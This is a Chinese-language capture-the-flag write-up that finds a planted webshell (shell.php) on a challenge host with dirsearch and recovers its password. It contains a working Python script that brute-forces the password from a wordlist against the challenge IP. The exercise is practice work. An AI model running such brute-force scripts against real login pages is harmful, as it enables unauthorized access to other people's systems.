记录一下一道简单但是自己尽量的不借助工具创造工具解决的一道题,好像大家都是用御剑解决的,但是macOS下是没有这个软件的,所以这里也提供一个mac下的解决方法
题目描述
网站被黑了 黑客会不会留下后门
需要的工具
1.dirsearch
直接github下载就可,20M且在命令行使用非常方便
安装包下载地址:https://github.com/maurosoria/dirsearch
2.python3.6以上版本(版本要求是为了使用dirsearch)
首先分析一波
很嚣张,获得webshell以后还留了一句话,结合题目描述我们知道应该是留下了后门。
然后破解一波
那么开始寻找后门入口,这里照顾macos玩家,终端运行dirsearch进行目录检测
检测结果如图,根据状态码200是我们可以访问的,那么index.php和shell.php我们试一下发现shell.php是留下的后门
访问http://114.67.246.176:10961/shell.php得到如下
查看源码没有得到有用信息,那么我们尝试密码爆破,虚拟机卡爆了,macos上又没有安装burpsuite,那么我们手动开荒,自己写一个爆破。
先随便输入一个密码admin
发现下面出现一行字,那么如果密码正确,也许在相同地方会出现flag值,所以结合爬虫写出我们的爆破代码如下:
import requests
from lxml import etree
url="http://114.67.246.176:10961/shell.php"
data={'pass':'1'}
myhead={'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0',
'Cookie': 'PHPSESSID=lkidk2engpm5hmvjg61oo9rja0',
'Origin': 'http://114.67.246.176:10961',
'Referer': 'http://114.67.246.176:10961/shell.php'
}
with open('shellpass.txt','r') as f:
passlist=f.readlines()
for each in passlist:
each=each.strip('\n')
data={'pass':each}
html=requests.post(url=url,headers=myhead,data=data).text
myparser = etree.HTMLParser(encoding="utf-8")
tree=etree.HTML(html,parser=myparser)
target=tree.xpath('//span/text()')
flag=target[0]
if(flag!='\n\t\t\t\t\t*ä¸\x8dæ\x98¯è\x87ªå·±ç\x9a\x84马ä¸\x8dè¦\x81ä¹±éª\x91ï¼\x81*\t\t\t\t\t'):
print(flag)
break
运行结果如图,flag值果然在这里,复制提交就结束了这道题,虽然题目简单,但是自己的解法为了方便一下mac用户,并且给出了不同的解法,看大家好像都是用御剑破解然后burp爆破。